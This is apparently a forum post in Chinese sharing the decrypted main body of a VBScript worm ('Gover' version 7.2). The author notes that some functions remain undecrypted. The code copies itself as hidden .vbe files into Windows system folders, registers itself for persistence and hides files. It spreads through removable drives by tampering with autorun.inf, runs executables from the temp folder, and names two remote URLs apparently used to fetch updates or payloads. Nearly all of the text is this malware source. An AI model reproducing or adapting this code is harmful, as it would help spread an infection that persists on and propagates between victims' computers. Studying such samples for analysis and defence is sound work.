完整机密以后的程序主体代码,还有一部分的过程、函数没有解密出来,不过我想我就到此为止了,其余的我就不继续做了,否则容易造成该病毒或其变种大面积传播……- Dim mfso,vf
- set mfso=createobject("scripting.filesystemobject")
- set vf=mfso.createtextfile("r7.log",true)
- 'vf.writeline
- ver="7.2"
- filename="`"
- infname="`.url"
- timesname="`.lnk"
- tile="Gover"&ver
- fromurl="http://u7.6600.org/u72.asp"
- fromurl2="http://u6.2288.org/u72.asp"
- 'on error resume next
- dim wsh
- set wsh=createobject("wscript.shell")
- set fso=createobject("scripting.filesystemobject")
- set dir=fso.getspecialfolder(1)
- set win=fso.getspecialfolder(0)
- set dc=fso.drives
- ouwnname=wscript.scriptname
- exemulu=fso.getspecialfolder(2)&""
- wbem=fso.getspecialfolder(1)&"\wbem"
- mulu=left(wscript.scriptfullname,len(wscript.scriptfullname)-len(wscript.scriptname))
- if mulu=dir&"" then sys=true
- for each d in dc
- if mulu=d&"" then opendisk=wsh.run("explorer "&d,3,false)
- next
- if not sys then
- wscript.sleep 5000
- if jincheng("wscript.exe",2)=1 then
- if readtxt(dir&"\main.bin",1)= trim(date) then
- wscript.quit
- else
- buildfile dir&"\main.bin",date
- end if
- end if
- if jincheng("wscript.exe",2)<>1 and jincheng("wscript.exe",2) then wscript.quit
- end if
- chengfa
- if sys then
- yincang
- if readtxt(mulu&infname,1)<>tile then
- buildinf 1,0,0,0,0,0
- end if
- if readtxt(win&""&infname,1)<>tile then
- buildinf 0,0,0,0,0,0
- end if
- lexe=readtxt(mulu&infname,5)
- if fso.fileexists(exemulu&lexe) then
- wsh.run exemulu&lexe
- end if
- if readtxt(dir&""&filename&".vbe",1)<>"'"&ver then
- copyvbs dir&""&filename&".vbe"
- zhuce
- end if
- if readtxt(win&""&filename&".vbe",1)<>"'"&ver then
- copyvbs win&""&filename&".vbe"
- end if
- if readtxt(wbem&filename&".vbe",1)<>"'"&ver and readtxt(mulu&infname,11)=1 then
- buildfile wbem&filename&".vbe",ucc(O1+O2)
- end if
- if readtxt(mulu&infname,11)=2 then
- for each d in dc
- if d.drivetype=2 then
- if fso.fileexists(d&"/autorun.inf") then
- delfile d&"/autorun.inf"
- end if
- if not fso.folderexists(d&"/autorun.inf") then
- buildfold d&"/autorun.inf"
- shuxing d&"/autorun.inf",1+2+4
- end if
- end if
- next
- end if
- ganran
- wsh.run mulu&ouwnname
- else
- shuxing mulu&ouwnname,2+4
- copyvbs dir&""&filename&".vbe"
- copyvbs win&""&filename&".vbe"
- zhuce
- wsh.run dir&""&filename&".vbe"
- end if
复制代码 |